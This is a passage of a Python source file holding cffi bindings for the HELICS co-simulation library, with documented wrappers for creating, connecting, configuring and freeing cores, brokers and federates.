Get a version string for HELICS.
"""
f = loadSym("helicsGetVersion")
result = f()
return ffi.string(result).decode()
def helicsGetSystemInfo() -> JSONType:
"""
Get a Python dictionary from JSON string containing version info.
The object contains fields with system information like cpu, core count, operating system, and memory,
as well as information about the HELICS build. Used for debugging reports and gathering other information.
"""
f = loadSym("helicsGetSystemInfo")
result = f()
return json.loads(ffi.string(result).decode())
def helicsGetBuildFlags() -> str:
"""
Get the build flags used to compile HELICS.
"""
f = loadSym("helicsGetBuildFlags")
result = f()
return ffi.string(result).decode()
def helicsGetCompilerVersion() -> str:
"""
Get the compiler version used to compile HELICS.
"""
f = loadSym("helicsGetCompilerVersion")
result = f()
return ffi.string(result).decode()
def helicsErrorInitialize():
"""
Return an initialized error object.
"""
f = loadSym("helicsErrorInitialize")
result = f()
if HELICS_VERSION == 2:
return ffi.new("helics_error *", result)
else:
return ffi.new("HelicsError *", result)
def helicsErrorClear(err: HelicsError):
"""
Clear an error object.
"""
f = loadSym("helicsErrorClear")
f(err)
def helicsIsCoreTypeAvailable(type: str) -> bool:
"""
Returns `True` if core/broker type specified is available in current compilation.
**Parameters**
- **`type`** - A string representing a core type. Options include "zmq", "udp", "ipc", "interprocess", "tcp", "default", "mpi".
**Returns**: `True` if `type` is available, `False` if `type` is not available.
"""
f = loadSym("helicsIsCoreTypeAvailable")
result = f(cstring(type))
return result == 1
def helicsCreateCore(type: str, name: str, init_string: str) -> HelicsCore:
"""
Create a `helics.HelicsCore`.
**Parameters**
- **`type`** - The type of the core to create.
- **`name`** - The name of the core. It can be a nullptr or empty string to have a name automatically assigned.
- **`init_string`** - An initialization string to send to the core. The format is similar to command line arguments. Typical options include a broker name, the broker address, the number of federates, etc.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCreateCore")
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), cstring(init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCreateCoreFromArgs(type: str, name: str, arguments: List[str]) -> HelicsCore:
"""
Create a `helics.HelicsCore` by passing command line arguments.
**Parameters**
- **`type`** - The type of the core to create.
- **`name`** - The name of the core. It can be a nullptr or empty string to have a name automatically assigned.
- **`arguments`** - The list of string values from a command line.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCreateCoreFromArgs")
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCoreClone(core: HelicsCore) -> HelicsCore:
"""
Create a new reference to an existing core.
This will create a new `helics.HelicsCore` that references the existing core.
The new `helics.HelicsCore` must be freed as well.
**Parameters**
- **`core`** - An existing `helics.HelicsCore`.
**Returns**: `helics.HelicsCore`.
"""
f = loadSym("helicsCoreClone")
err = helicsErrorInitialize()
result = f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsCoreIsValid(core: HelicsCore) -> bool:
"""
Check if a `helics.HelicsCore` is a valid object.
**Parameters**
- **`core`** - The `helics.HelicsCore` object to test.
**Returns**: `True` if valid, `False` if not valid.
"""
f = loadSym("helicsCoreIsValid")
result = f(core.handle)
return result == 1
def helicsCreateBroker(type: str, name: str = "", init_string: str = "") -> HelicsBroker:
"""
Create a broker object
**Parameters**
- **`type`** - The type of the broker to create.
- **`name`** - The name of the broker. It can be a nullptr or empty string to have a name automatically assigned.
- **`init_string`** - An initialization string to send to the core-the format is similar to command line arguments. Typical options include a broker address such as --broker="XSSAF" if this is a subbroker, or the number of federates, or the address.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsCreateBroker")
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), cstring(init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
def helicsCreateBrokerFromArgs(type: str, name: str, arguments: List[str]) -> HelicsBroker:
"""
Create a `helics.HelicsCore` by passing command line arguments.
**Parameters**
- **`type`** - The type of the core to create.
- **`name`** - The name of the core. It can be a nullptr or empty string to have a name automatically assigned.
- **`arguments`** - The list of string values from a command line.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsCreateBrokerFromArgs")
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
err = helicsErrorInitialize()
result = f(cstring(type), cstring(name), argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
def helicsBrokerClone(broker: HelicsBroker) -> HelicsBroker:
"""
Create a new reference to an existing broker.
This will create a new broker object that references the existing broker it must be freed as well.
**Parameters**
- **`broker`** - An existing `helics.HelicsBroker`.
**Returns**: `helics.HelicsBroker`.
"""
f = loadSym("helicsBrokerClone")
err = helicsErrorInitialize()
result = f(broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsBroker(result)
def helicsBrokerIsValid(broker: HelicsBroker) -> bool:
"""
Check if a broker object is a valid object.
**Parameters**
- **`broker`** - The `helics.HelicsBroker` object to test.
**Returns**: `True` if valid, `False` if not valid.
"""
f = loadSym("helicsBrokerIsValid")
result = f(broker.handle)
return result == 1
def helicsBrokerIsConnected(broker: HelicsBroker) -> bool:
"""
Check if a broker is connected.
A connected broker implies it is attached to cores or cores could reach out to communicate.
**Returns**: `True` if connected, `False` if not connected.
"""
f = loadSym("helicsBrokerIsConnected")
result = f(broker.handle)
return result == 1
def helicsBrokerDataLink(broker: HelicsBroker, source_name: str, target_name: str):
"""
Link a named publication and named input using a broker.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`source_name`** - The name of the publication.
- **`target_name`** - The name of the target to send the publication data.
"""
f = loadSym("helicsBrokerDataLink")
err = helicsErrorInitialize()
f(broker.handle, cstring(source_name), cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerAddSourceFilterToEndpoint(broker: HelicsBroker, filter_name: str, endpoint_name: str):
"""
Link a named filter to a source endpoint.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data from.
"""
f = loadSym("helicsBrokerAddSourceFilterToEndpoint")
err = helicsErrorInitialize()
f(broker.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerAddDestinationFilterToEndpoint(broker: HelicsBroker, filter_name: str, endpoint_name: str):
"""
Link a named filter to a destination endpoint.
**Parameters**
- **`broker`** - The broker to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data going to.
"""
f = loadSym("helicsBrokerAddDestinationFilterToEndpoint")
err = helicsErrorInitialize()
f(broker.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerMakeConnections(broker: HelicsBroker, file: str):
"""
Load a file containing connection information.
**Parameters**
- **`broker`** - The broker to generate the connections from.
- **`file`** - A JSON or TOML file containing connection information.
"""
f = loadSym("helicsBrokerMakeConnections")
err = helicsErrorInitialize()
f(broker.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreWaitForDisconnect(core: HelicsCore, ms_to_wait: int) -> bool:
"""
Wait for the core to disconnect.
**Parameters**
- **`core`** - The core to wait for.
- **`ms_to_wait`** - The time out in millisecond (<0 for infinite timeout).
"""
f = loadSym("helicsCoreWaitForDisconnect")
err = helicsErrorInitialize()
result = f(core.handle, ms_to_wait, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsBrokerWaitForDisconnect(broker: HelicsBroker, ms_to_wait: int) -> bool:
"""
Wait for the broker to disconnect.
**Parameters**
- **`broker`** - The broker to wait for.
- **`ms_to_wait`** - The time out in millisecond (<0 for infinite timeout).
"""
f = loadSym("helicsBrokerWaitForDisconnect")
err = helicsErrorInitialize()
result = f(broker.handle, ms_to_wait, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsCoreIsConnected(core: HelicsCore) -> bool:
"""
Check if a core is connected.
A connected core implies it is attached to federates or federates could be attached to it.
**Returns**: `True` if connected, `False` if not connected.
"""
f = loadSym("helicsCoreIsConnected")
result = f(core.handle)
return result == 1
def helicsCoreDataLink(core: HelicsCore, source_name: str, target_name: str):
"""
Link a named publication and named input using a core.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`source_name`** - The name of the publication.
- **`target_name`** - The name of the target to send the publication data.
"""
f = loadSym("helicsCoreDataLink")
err = helicsErrorInitialize()
f(core.handle, cstring(source_name), cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreAddSourceFilterToEndpoint(core: HelicsCore, filter_name: str, endpoint_name: str):
"""
Link a named filter to a source endpoint.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data from.
"""
f = loadSym("helicsCoreAddSourceFilterToEndpoint")
err = helicsErrorInitialize()
f(core.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreAddDestinationFilterToEndpoint(core: HelicsCore, filter_name: str, endpoint_name: str):
"""
Link a named filter to a destination endpoint.
**Parameters**
- **`core`** - The core to generate the connection from.
- **`filter`** - The name of the filter.
- **`endpoint`** - The name of the endpoint to filter the data going to.
"""
f = loadSym("helicsCoreAddDestinationFilterToEndpoint")
err = helicsErrorInitialize()
f(core.handle, cstring(filter_name), cstring(endpoint_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreMakeConnections(core: HelicsCore, file: str):
"""
Load a file containing connection information.
**Parameters**
- **`core`** - The core to generate the connections from.
- **`file`** - A JSON or TOML file containing connection information.
"""
f = loadSym("helicsCoreMakeConnections")
err = helicsErrorInitialize()
f(core.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerGetIdentifier(broker: HelicsBroker) -> str:
"""
Get an identifier for the broker.
**Parameters**
- **`broker`** - The broker to query.
**Returns**: A string containing the identifier for the broker.
"""
f = loadSym("helicsBrokerGetIdentifier")
result = f(broker.handle)
return ffi.string(result).decode()
def helicsCoreGetIdentifier(core: HelicsCore) -> str:
"""
Get an identifier for the core.
**Parameters**
- **`core`** - The core to query.
**Returns**: A string with the identifier of the core.
"""
f = loadSym("helicsCoreGetIdentifier")
result = f(core.handle)
return ffi.string(result).decode()
def helicsBrokerGetAddress(broker: HelicsBroker) -> str:
"""
Get the network address associated with a broker.
**Parameters**
- **`broker`** - The broker to query.
**Returns**: A string with the network address of the broker.
"""
f = loadSym("helicsBrokerGetAddress")
result = f(broker.handle)
return ffi.string(result).decode()
def helicsCoreGetAddress(core: HelicsCore) -> str:
"""
Get the network address associated with a core.
**Parameters**
- **`core`** - The core to query.
**Returns**: A string with the network address of the broker.
"""
f = loadSym("helicsCoreGetAddress")
result = f(core.handle)
return ffi.string(result).decode()
def helicsCoreSetReadyToInit(core: HelicsCore):
"""
Set the core to ready for init.
This function is used for cores that have filters but no federates so there needs to be a direct signal to the core to trigger the federation initialization.
**Parameters**
- **`core`** - The `helics.HelicsCore` to enable init values for.
"""
f = loadSym("helicsCoreSetReadyToInit")
err = helicsErrorInitialize()
f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreConnect(core: HelicsCore) -> bool:
"""
Connect a core to the federate based on current configuration.
**Parameters**
- **`core`** - The core to connect.
**Returns**: `True` if `core` is connected successfully, else `False`.
"""
f = loadSym("helicsCoreConnect")
err = helicsErrorInitialize()
result = f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsCoreDisconnect(core: HelicsCore):
"""
Disconnect a core from the federation.
**Parameters**
- **`core`** - The core to query.
"""
f = loadSym("helicsCoreDisconnect")
err = helicsErrorInitialize()
f(core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsGetFederateByName(fed_name: str) -> HelicsFederate:
"""
Get an existing `helics.HelicsFederate` from a core by name.
The federate must have been created by one of the other functions and at least one of the objects referencing the created federate must still be active in the process.
**Parameters**
- **`fed_name`** - The name of the federate to retrieve.
**Returns**: `helics.HelicsFederate`.
"""
f = loadSym("helicsGetFederateByName")
err = helicsErrorInitialize()
result = f(cstring(fed_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederate(result)
def helicsBrokerDisconnect(broker: HelicsBroker):
"""
Disconnect a broker.
**Parameters**
- **`broker`** - The broker to disconnect.
"""
f = loadSym("helicsBrokerDisconnect")
err = helicsErrorInitialize()
f(broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDestroy(fed: HelicsFederate):
"""
Disconnect and free a federate.
"""
f = loadSym("helicsFederateDestroy")
f(fed.handle)
def helicsBrokerDestroy(broker: HelicsBroker):
"""
Disconnect and free a broker.
"""
f = loadSym("helicsBrokerDestroy")
f(broker.handle)
def helicsCoreDestroy(core: HelicsCore):
"""
Disconnect and free a core.
"""
f = loadSym("helicsCoreDestroy")
f(core.handle)
def helicsCoreFree(core: HelicsCore):
"""
Release the memory associated with a core.
"""
f = loadSym("helicsCoreFree")
f(core.handle)
def helicsBrokerFree(broker: HelicsBroker):
"""
Release the memory associated with a broker.
"""
f = loadSym("helicsBrokerFree")
f(broker.handle)
def helicsCreateValueFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsValueFederate:
"""
Creation and destruction of Federates.
Create `helics.HelicsValueFederate` from `helics.HelicsFederateInfo`.
`helics.HelicsValueFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`fed_name`** - The name of the federate to create, can NULL or an empty string to use the default name from fi or an assigned name.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsValueFederate`.
"""
f = loadSym("helicsCreateValueFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsValueFederate(result)
def helicsCreateValueFederateFromConfig(config_file: str) -> HelicsValueFederate:
"""
Create `helics.HelicsValueFederate` from a JSON file, JSON string, or TOML file.
`helics.HelicsValueFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`config_file`** - A JSON file or a JSON string or TOML file that contains setup and configuration information.
**Returns**: `helics.HelicsValueFederate`.
"""
f = loadSym("helicsCreateValueFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsValueFederate(result)
def helicsCreateMessageFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsMessageFederate:
"""
Create `helics.HelicsMessageFederate` from `helics.HelicsFederateInfo`.
`helics.HelicsMessageFederate` objects can be used in all functions that take a `helics.HelicsFederate` as an argument.
**Parameters**
- **`fed_name`** - The name of the federate to create.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsMessageFederate`.
"""
f = loadSym("helicsCreateMessageFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessageFederate(result)
def helicsCreateMessageFederateFromConfig(config_file: str) -> HelicsMessageFederate:
"""
Create `helics.HelicsMessageFederate` from a JSON file or JSON string or TOML file.
`helics.HelicsMessageFederate` objects can be used in all functions that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`config_file`** - A config (JSON,TOML) file or a JSON string that contains setup and configuration information.
**Returns**: `helics.HelicsMessageFederate`.
"""
f = loadSym("helicsCreateMessageFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessageFederate(result)
def helicsCreateCombinationFederate(fed_name: str, fi: HelicsFederateInfo = None) -> HelicsCombinationFederate:
"""
Create a combination federate from `helics.HelicsFederateInfo`.
Combination federates are both value federates and message federates, objects can be used in all functions
that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`fed_name`** - A string with the name of the federate, can be NULL or an empty string to pull the default name from fi.
- **`fi`** - The federate info object that contains details on the federate.
**Returns**: `helics.HelicsCombinationFederate`.
"""
f = loadSym("helicsCreateCombinationFederate")
err = helicsErrorInitialize()
if fi is None:
fi = helicsCreateFederateInfo()
result = f(cstring(fed_name), fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCombinationFederate(result)
def helicsCreateCombinationFederateFromConfig(config_file: str) -> HelicsCombinationFederate:
"""
Create a combination federate from a JSON file or JSON string or TOML file.
Combination federates are both value federates and message federates, objects can be used in all functions
that take a `helics.HelicsFederate` object as an argument.
**Parameters**
- **`config_file`** - A JSON file or a JSON string or TOML file that contains setup and configuration information.
**Returns**: `helics.HelicsCombinationFederate`.
"""
f = loadSym("helicsCreateCombinationFederateFromConfig")
err = helicsErrorInitialize()
result = f(cstring(config_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCombinationFederate(result)
def helicsFederateClone(fed: HelicsFederate) -> HelicsFederate:
"""
Create a new reference to an existing federate.
This will create a new `helics.HelicsFederate` object that references the existing federate.
The new object must be freed as well.
**Parameters**
- **`fed`** - An existing `helics.HelicsFederate`.
**Returns**: `helics.HelicsFederate`.
"""
f = loadSym("helicsFederateClone")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederate(result)
def helicsCreateFederateInfo() -> HelicsFederateInfo:
"""
Create `helics.HelicsFederateInfo` for specifying federate information when constructing a federate.
**Returns**: `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsCreateFederateInfo")
result = f()
return HelicsFederateInfo(result)
def helicsFederateInfoClone(fi: HelicsFederateInfo) -> HelicsFederateInfo:
"""
Create `helics.HelicsFederateInfo` from an existing one and clone the information.
**Parameters**
- **`fi`** - A federateInfo object to duplicate.
**Returns**: `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsFederateInfoClone")
err = helicsErrorInitialize()
result = f(fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederateInfo(result)
def helicsFederateInfoLoadFromArgs(fi: HelicsFederateInfo, arguments: List[str]):
"""
Load federate info from command line arguments.
**Parameters**
- **`fi`** - A federateInfo object.
- **`argc`** - The number of command line arguments.
- **`argv`** - An array of strings from the command line.
"""
f = loadSym("helicsFederateInfoLoadFromArgs")
err = helicsErrorInitialize()
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
f(fi.handle, argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoLoadFromString(fi: HelicsFederateInfo, arguments: str):
"""
Load federate info from command line arguments contained in a string.
**Parameters**
- **`fi`** - A federateInfo object.
- **`arguments`** - Command line argument specified in a string
"""
f = loadSym("helicsFederateInfoLoadFromString")
err = helicsErrorInitialize()
f(fi.handle, cstring(arguments), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoFree(fi: HelicsFederateInfo):
"""
Delete the memory associated with `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsFederateInfoFree")
f(fi.handle)
def helicsFederateIsValid(fed: HelicsFederate) -> bool:
"""
Check if a `helics.HelicsFederate` is valid.
**Returns**: `True` if the federate is a valid active federate, `False` otherwise.
"""
f = loadSym("helicsFederateIsValid")
result = f(fed.handle)
return result == 1
def helicsFederateInfoSetCoreName(fi: HelicsFederateInfo, core_name: str):
"""
Set the name of the core to link to for a federate.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_name`** - The identifier for a core to link to.
"""
f = loadSym("helicsFederateInfoSetCoreName")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreInitString(fi: HelicsFederateInfo, core_init_string: str):
"""
Set the initialization string for the core usually in the form of command line arguments.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_init_string`** - A string containing command line arguments to be passed to the core.
"""
f = loadSym("helicsFederateInfoSetCoreInitString")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerInitString(fi: HelicsFederateInfo, broker_init_string: str):
"""
Set the initialization string that a core will pass to a generated broker usually in the form of command line arguments.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_init_string`** - A string with command line arguments for a generated broker.
"""
f = loadSym("helicsFederateInfoSetBrokerInitString")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreType(fi: HelicsFederateInfo, core_type: HelicsCoreType):
"""
Set the core type by integer code.
Valid values available by definitions in `api-data.h`.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_type`** - An numerical code for a core type see `helics.HelicsCoreType`.
"""
f = loadSym("helicsFederateInfoSetCoreType")
err = helicsErrorInitialize()
f(fi.handle, HelicsCoreType(core_type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreTypeFromString(fi: HelicsFederateInfo, core_type: str):
"""
Set the core type from a string.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_type`** - A string naming a core type.
"""
f = loadSym("helicsFederateInfoSetCoreTypeFromString")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBroker(fi: HelicsFederateInfo, broker_string: str):
"""
Set the name or connection information for a broker.
This is only used if the core is automatically created, the broker information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_string`** - A string which defines the connection information for a broker either a name or an address.
"""
f = loadSym("helicsFederateInfoSetBroker")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerKey(fi: HelicsFederateInfo, broker_key: str):
"""
Set the key for a broker connection.
This is only used if the core is automatically created, the broker information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_key`** - A string containing a key for the broker to connect.
"""
f = loadSym("helicsFederateInfoSetBrokerKey")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_key), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerPort(fi: HelicsFederateInfo, broker_port: Union[int, str]):
"""
Set the port to use for the broker.
This is only used if the core is automatically created, the broker information will be transferred to the core for connection.
This will only be useful for network broker connections.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_port`** - The integer port number to use for connection with a broker.
"""
f = loadSym("helicsFederateInfoSetBrokerPort")
err = helicsErrorInitialize()
broker_port = int(broker_port)
f(fi.handle, broker_port, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetLocalPort(fi: HelicsFederateInfo, local_port: Union[int, str]):
"""
Set the local port to use.
This is only used if the core is automatically created, the port information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`local_port`** - A string with the port information to use as the local server port can be a number or "auto" or "os_local".
"""
f = loadSym("helicsFederateInfoSetLocalPort")
err = helicsErrorInitialize()
local_port = str(local_port)
f(fi.handle, cstring(local_port), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsGetPropertyIndex(value: str) -> HelicsProperty:
"""
Get a property index for use in `helics.helicsFederateInfoSetFlagOption`, `helics.helicsFederateInfoSetTimeProperty`, or `helics.helicsFederateInfoSetIntegerProperty`.
**Parameters**
- **`value`** - A string with the property name.
**Returns**: An int with the property code or (-1) if not a valid property.
"""
f = loadSym("helicsGetPropertyIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown property index for flag `{value}`".format(value=value))
else:
return HelicsProperty(result)
def helicsGetFlagIndex(value: str) -> HelicsFederateFlag:
"""
Get a property index for use in `helics.helicsFederateInfoSetFlagOption`, `helics.helicsFederateSetFlagOption`.
**Parameters**
- **`value`** - A string with the option name.
**Returns**: An int with the property code or (-1) if not a valid property.
"""
f = loadSym("helicsGetFlagIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown property index for flag `{value}`".format(value=value))
else:
try:
return HelicsFlag(result)
except Exception as _:
return HelicsFederateFlag(result)
def helicsGetOptionIndex(value: str) -> HelicsHandleOption:
"""
Get an option index for use in `helics.helicsPublicationSetOption`, `helics.helicsInputSetOption`, `helics.helicsEndpointSetOption`,
`helics.helicsFilterSetOption`, and the corresponding get functions
**Parameters**
- **`value`** - A string with the option name
**Returns**: An int with the option index or (-1) if not a valid property.
"""
f = loadSym("helicsGetOptionIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown option index for flag `{value}`".format(value=value))
else:
return HelicsHandleOption(result)
def helicsGetOptionValue(value: str) -> int:
"""
Get an option value for use in `helics.helicsPublicationSetOption`, `helics.helicsInputSetOption`, `helics.helicsEndpointSetOption`,
`helics.helicsFilterSetOption`.
**Parameters**
- **`value`** - A string representing the value
**Returns**: An int with the option value or (-1) if not a valid value.
"""
f = loadSym("helicsGetOptionValue")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown option value for flag `{value}`".format(value=value))
else:
return result
def helicsFederateInfoSetFlagOption(fi: HelicsFederateInfo, flag: Union[int, HelicsFederateFlag, HelicsFlag], value: bool):
"""
Set a flag in the info structure
Valid flags are available `helics.HelicsFederateFlag`.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`flag`** - A numerical index for a flag.
- **`value`** - The desired value of the flag `True` or `False`.
"""
f = loadSym("helicsFederateInfoSetFlagOption")
err = helicsErrorInitialize()
f(fi.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetSeparator(fi: HelicsFederateInfo, separator: str):
"""
Set the separator character in the info structure.
The separator character is the separation character for local publications/endpoints in creating their global name.
For example if the separator character is '/' then a local endpoint would have a globally reachable name of fedName/localName.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`separator`** - The character to use as a separator.
"""
f = loadSym("helicsFederateInfoSetSeparator")
err = helicsErrorInitialize()
f(fi.handle, cchar(separator), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetTimeProperty(fi: HelicsFederateInfo, time_property: HelicsProperty, value: HelicsTime):
"""
Set the output delay for a federate.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`time_property`** - An integer representation of the time based property to set see `helics.HelicsProperty`.
- **`propertyValue`** - The value of the property to set the timeProperty to.
"""
f = loadSym("helicsFederateInfoSetTimeProperty")
err = helicsErrorInitialize()
f(fi.handle, HelicsProperty(time_property), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetIntegerProperty(fi: HelicsFederateInfo, property: HelicsProperty, value: int):
"""
Set an integer property for a federate.
Set known properties.
**Parameters**
- **`fi`** - The federateInfo object to alter.
- **`property`** - `helics.HelicsProperty`.
- **`value`** - The value to set the property to.
"""
f = loadSym("helicsFederateInfoSetIntegerProperty")
err = helicsErrorInitialize()
f(fi.handle, HelicsProperty(property), value, err)
if err.error_code != 0:
